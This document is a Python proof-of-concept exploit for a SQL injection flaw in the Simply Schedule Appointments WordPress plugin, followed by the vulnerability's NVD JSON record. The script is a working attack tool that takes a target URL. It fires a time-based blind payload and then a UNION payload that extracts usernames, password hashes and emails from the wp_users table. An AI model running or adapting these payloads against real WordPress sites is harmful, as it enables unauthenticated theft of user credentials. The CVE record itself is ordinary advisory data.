CVE-2026-3658

import requests import sys # CVE-2026-3658 SQL Injection PoC # Target: WordPress Simply Schedule Appointments Booking Plugin < 1.6.10.1 # Vulnerability: SQL Injection via 'fields' parameter def exploit_sql_injection(target_url): """ Exploit SQL injection vulnerability in Simply Schedule Appointments plugin This PoC demonstrates extracting database user() information """ # Endpoint for appointment types API endpoint = f"{target_url}/wp-json/ssa/v1/appointment_types" # Malicious payload to extract database user information # Using time-based blind SQL injection technique payload = { 'fields': "1,2,(SELECT SLEEP(5) AND (SELECT user FROM wp_users LIMIT 1))" } headers = { 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } print(f"[*] Target: {target_url}") print(f"[*] Exploiting SQL Injection vulnerability...") print(f"[*] Payload: {payload['fields']}") try: response = requests.get(endpoint, params=payload, headers=headers, timeout=30) print(f"[*] Response Status: {response.status_code}") if response.status_code == 200: print("[+] Request successful - potential SQL injection detected") print(f"[*] Response: {response.text[:500]}") else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.Timeout: print("[+] Time-based SQL injection confirmed - database is vulnerable") except Exception as e: print(f"[-] Error: {str(e)}") def extract_user_data(target_url): """ Extract sensitive user data using UNION-based SQL injection """ endpoint = f"{target_url}/wp-json/ssa/v1/appointment_types" # UNION-based injection to extract user credentials union_payload = "1 UNION SELECT user_login,user_pass,user_email,4,5,6,7 FROM wp_users--" payload = {'fields': union_payload} headers = {'User-Agent': 'Mozilla/5.0'} print(f"[*] Extracting user data with UNION injection...") try: response = requests.get(endpoint, params=payload, headers=headers, timeout=30) print(f"[*] Response Status: {response.status_code}") if response.status_code == 200 and 'user_login' in response.text: print("[+] User data extraction successful") print(f"[*] Response: {response.text[:1000]}") except Exception as e: print(f"[-] Error: {str(e)}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-3658_poc.py <target_url>") print("Example: python cve-2026-3658_poc.py http://example.com") sys.exit(1) target = sys.argv[1].rstrip('/') exploit_sql_injection(target) print("\n[*] Attempting data extraction...") extract_user_data(target)

{"cve": {"id": "CVE-2026-3658", "sourceIdentifier": "[email protected]", "published": "2026-03-19T12:16:18.807", "lastModified": "2026-04-22T21:32:08.360", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to SQL Injection via the 'fields' parameter in all versions up to, and including, 1.6.10.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database, including usernames, email addresses, and password hashes."}, {"lang": "es", "value": "El plugin Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin para WordPress es vulnerable a inyección SQL a través del parámetro 'fields' en todas las versiones hasta la, e incluyendo, la 1.6.10.0 debido a un escape insuficiente en el parámetro proporcionado por el usuario y la falta de preparación suficiente en la consulta SQL existente. Esto permite a atacantes no autenticados añadir consultas SQL adicionales en consultas ya existentes que pueden utilizarse para extraer información sensible de la base de datos, incluyendo nombres de usuario, direcciones de correo electrónico y hashes de contraseñas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/class-appointment-type-model.php#L907", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/lib/td-util/class-td-api-model.php#L140", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/simply-schedule-appointments/trunk/includes/lib/td-util/class-td-db-model.php#L1171", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3485143/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/67c7b9b2-e73f-47fe-aecc-14e998a607c8?source=cve", "source": "[email protected]"}]}}